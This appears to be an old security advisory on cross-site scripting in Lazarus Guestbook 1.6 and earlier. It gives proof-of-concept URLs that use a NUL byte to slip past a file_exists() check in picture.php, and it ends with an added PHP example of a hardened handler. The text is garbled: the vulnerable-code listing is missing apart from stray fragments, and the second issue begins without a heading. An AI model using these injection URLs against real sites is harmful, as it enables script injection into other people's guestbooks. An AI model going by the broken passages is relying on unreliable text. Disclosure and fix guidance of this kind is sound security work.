Product : Lazarus Guestbook
Website : http://carbonize.co.uk/Lazarus/
Version : <= 1.6
Problem : Cross Site Scripting

1)
The first problem is in lang/codes-english.php: the "show" parameter isn't properly sanitised.
This can be exploited to execute arbitrary HTML and JavaScript code.

Vulnerable code in lang/codes-english.php near line 4

[Listing of lang/codes-english.php not preserved; only line numbers 1-4 and the tail of the file survive:]
50 \n";
53 }
54 ?>
55

****************
If magic_quotes_gpc is OFF, this protection can be bypassed by specifying an existing image file (example: "img/home.gif") followed by a null character (%00).

POC : http://localhost/lazarusgb/picture.php?img=../img/home.gif%00[code]

file_exists("$GB_TMP/$_GET[img]") will then return true and the HTML code will be executed.

Exploit:

http://localhost/lazarusgb/picture.php?img=../img/home.gif%00%22%3E[XSS]
http://localhost/lazarusgb/picture.php?img=../img/home.gif%00%22%3E
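
As an added illustration of the fix for both issues above (the unescaped "show" parameter and the NUL-byte bypass of the file_exists() check), here is a hardened request handler. This is example code written for this page, not Lazarus Guestbook's own picture.php or codes-english.php; the image directory GB_IMG_DIR, the accepted file-name pattern and the way "show" is echoed are assumptions.

```php
<?php
// Added example (not Lazarus Guestbook code): validating the "img" parameter
// before it reaches file_exists()/is_file(), and escaping "show" on output.
// GB_IMG_DIR and the accepted file-name shape are assumptions for illustration.

declare(strict_types=1);

const GB_IMG_DIR = __DIR__ . '/img';  // assumed image directory

/**
 * Return the absolute path of an allowed image, or null if the request is
 * not acceptable. Rejects NUL bytes, directory separators and anything that
 * resolves outside GB_IMG_DIR, so a name such as "../img/home.gif%00..."
 * is refused before any filesystem call is made.
 */
function resolve_image(string $img): ?string
{
    // A NUL byte is never part of a legitimate file name. PHP before 5.3.4
    // truncated the path at the NUL, which is what the advisory relies on;
    // the explicit check makes the handler independent of the PHP version.
    if (strpos($img, "\0") !== false) {
        return null;
    }
    // Only a bare file name of the expected shape is accepted (no slashes,
    // no "..", no quotes or angle brackets).
    if (!preg_match('/\A[A-Za-z0-9_-]+\.(gif|jpe?g|png)\z/', $img)) {
        return null;
    }
    $base = realpath(GB_IMG_DIR);
    $path = realpath(GB_IMG_DIR . '/' . $img);
    if ($base === false || $path === false) {
        return null;
    }
    // Defence in depth: the canonical path must stay inside the image directory.
    if (strncmp($path, $base . DIRECTORY_SEPARATOR, strlen($base) + 1) !== 0) {
        return null;
    }
    return is_file($path) ? $path : null;
}

/** Escape a request value before placing it in an HTML attribute or body. */
function h(string $s): string
{
    return htmlspecialchars($s, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
}

// --- request handling (assumed shape of the guestbook's image page) ---
$img  = (string)($_GET['img']  ?? '');
$show = (string)($_GET['show'] ?? '');

$path = resolve_image($img);
if ($path === null) {
    http_response_code(404);
    exit('Unknown image');
}

// Even the validated file name is escaped on output, and "show" is only
// ever emitted through h(), so the response cannot carry request-supplied markup.
echo '<img src="img/' . h(basename($path)) . '" alt="' . h($show) . '">';
```

The whitelist regular expression is the primary control; the NUL-byte test and the realpath() prefix comparison are there so that a later relaxation of the pattern does not silently reopen the traversal. Relying on magic_quotes_gpc, as the advisory's precondition hints, is not a fix: it only escapes the NUL byte as a side effect and was removed in PHP 5.4.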

Contact : simo64[at]gmail[dot]com
Moroccan Security Research Team